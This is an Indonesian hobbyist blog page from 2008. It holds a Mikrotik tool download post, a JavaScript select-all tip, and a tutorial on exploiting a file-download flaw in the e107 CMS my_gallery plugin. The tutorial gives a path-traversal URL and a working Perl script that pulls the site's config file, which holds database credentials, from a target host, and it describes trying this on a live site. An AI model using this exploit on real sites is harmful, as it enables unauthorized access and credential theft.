NitrouZ Personal Pages » script

Mikrotik Script Maker [KotjokDjaja Team]

NitrouZ — Mon, 29 Dec 2008 03:20:34 +0000

Masih terlalu baru untuk main mikrotik ? Seperti saya contohnya :D Kali ini, om LucuBRB abis buatin tools kecil bagi yang ingin belajar mikrotik supaya lebih mudah untuk mengkonfigurasi, karena selama ini banyak temen-temen yang masih salah/belum paham/bingung dalam mengkonfigurasinya.

Screenshot :

Welcome Screen

Mikrotik Script Maker Queue

Mikrotik Script Maker Queue Tree

Mikrotik Script Maker RSC

Cara Penggunaan :

Jalankan file *.exe, lalu ikuti instruksi yang ada di setiap menu. Selesai ! :D

Download Files : Mikrotik Script Maker

MD5 : 8272366ae63f2bdec7e9098fada72656

Thanks to : LucuBRB

Copy to clipboard using JavaScript

NitrouZ — Fri, 12 Dec 2008 01:05:48 +0000

Setelah berpusing ria, dan akhirnya ngga’ menghubungi adeknya :p, akhirnya saya googling dan nemu beberapa contoh penggunaan JavaScript Auto Copy to Clipboard, akhirnya saya menemukan satu fungsi yang menurut saya keren :D Pada instalasi dasar, beberapa browser selain Internet Explorer tidak mendukung Auto Copy menggunakan JavaScript. Jadi script auto copy ini hanya berfungsi untuk Internet Explorer saja :D

Nah, lalu apa yang menarik di sini ? Fungsi yang saya dapat dari hasil kemarin adalah, saat cursor melakukan click, maka semua yang ada pada textarea akan terpilih (Tested on Firefox, IE, dan Opera). Lalu untuk apa fungsinya ? Ya fungsinya adalah untuk select all aja :p Tergantung variasi kalian ingin digunakan untuk apa.

Berikut fungsi javascript nya :

Setelah membuat fungsi di atas menggunakan javascript, sekarang buatlah rangkaian form seperti berikut :


<!-- your text here -->

Kenapa tidak diberi closing tag ? Karena kesimpulan saya itu hanya untuk identifikasi saja bahwa fungsi tersebut baru bisa di jalankan apabila form pemanggilnya di keluarkan. CMIIW. Kalau dikasih closing tag juga ngga’ masalah kok. Jangan lupa pada form tersebut diberi atribut name dengan value kopi

Nah, pada bagian berikutnya saya menggunakan textarea (bisa juga yang lain seperti input). Pada textarea tersebut saya menambahkan attribut name dengan value txta_pilihan. Lalu pada bagian OnClick (karena fungsi ini di konfigurasi jalan setelah di klik), saya menambahkan fungsi yang telah terbuat di atas yaitu onclick=”doclip(‘txta_pilihan’)”. Di mana doclip adalah fungsi yang telah di buat dan txta_pilihan adalah nama textarea yang ingin di pilih.

Bagaimana hasilnya ? Silakan di coba :) Laporkan jika terjadi error :D

[Tutorial] Contoh Exploitasi Vulnerabilities Pada e107

drubicza — Sat, 06 Dec 2008 23:19:55 +0000

Disclaimer
Tutorial ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan tutorial ini. Use at your own risk.

Ilustrasi
Awalnya saya ingin membuat tutorial tentang javascript, namun entah mengapa tiba-tiba muncul keinginan untuk mencari hal yang menarik. Akhirnya saya coba browsing ke sana kemari hingga tiba di salah satu situs yang cukup menarik karena menggunakan e107. Dan setelah saya perhatikan sebentar, ternyata situs tersebut terdapat plugin my_gallery. Karena penasaran, saya coba mencari vulnerabilities e107 di milw0rm, dan kebetulan ketemu vulnerabilities untuk plugin tersebut, seperti pada gambar berikut ini:

Ternyata plugin tersebut memungkinkan local file download :) hmmm… menarik. Ok, akhirnya saya mendownload e107 untuk mencari tahu apa saja file-file penting pada e107. Setelah diekstrak, saya lihat ada file e107_config.php dan ternyata file tersebut kosong. Dari situ saya mengambil kesimpulan sementara bahwa file tersebut akan diisi oleh e107 pada saat instalasi:

Selain hal tersebut, saya juga memperhatikan bahwa di sana ada file class2.php dan ternyata setelah diperhatikan secara seksama dalam tempo yang sesingkat-singkatnya :D ternyata benar, file e107_config.php akan diisi oleh e107 ketika instalasi berlangsung:

Sekarang, saya kembali ke browser untuk mencoba apakah jurusnya ampuh B-) dan ternyata benar. File konfigurasi e107 bisa diakses pada path ../../e107_config.php jadi, bentuk url selengkapnya seperti ini:

http://www.target.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php

Contohnya seperti ini:

Nah, daripada menggunakan browser, bagaimana jika kita membuat script sederhana untuk memudahkan proses ini :D . Jadi script ini akan menerima 2 parameter dimana parameter terakhir sifatnya optional yaitu nama file pada target yang ingin dilihat. Jika parameter tersebut kosong, maka akan mencoba membuka file configurasi e107. Nah, berikut ini snippetnya dalam bahasa perl (maaf kodenya kacau maklum saya bukan programmer):

#!/usr/bin/perl

use LWP::UserAgent;

die("[i] aturan pakai: e107conf.pl  [file]\n") unless @ARGV > 0;
$ua = LWP::UserAgent->new;
$fx = ($ARGV[1] eq '') ? "../../e107_config.php" : $ARGV[1];
$ex = $ua->request(HTTP::Request->new(GET => "http://".$ARGV[0]."/e107_plugins/my_gallery/dload.php?file=".$fx));

if ($ex->is_success) { print "[+] web: ".$ARGV[0]."\n".$ex->content."\n"; }

Nah, berikut ini 2 screenshot ketika script ini bekerja dimana pada screenshot pertama kita hanya memberikan alamat website yang ingin dieksploitasi, sedangkan pada screenshot ke-2 kita memberikan parameter ke-2 yaitu nama file yang ingin dilihat :)

Penutup
Sekian dulu tutorial sederhana dari saya, semoga bisa bermanfaat untuk Anda. Sampai jumpa di tutorial berikutnya :)

Ucapan Terima Kasih
Tanpa Urutan: Tuhan Yang Maha Esa, NitrouZ, pinczakko, hddstudio, dylavig, LiFe, LucuBRB, 4NV|e, movzx, k0il, semua rekan-rekan yang tidak sempat saya sebutkan satu-satu di sini (you know who you are) :) dan Anda yang telah membaca tutorial ini… (terima kasih telah membaca tutorial ini)…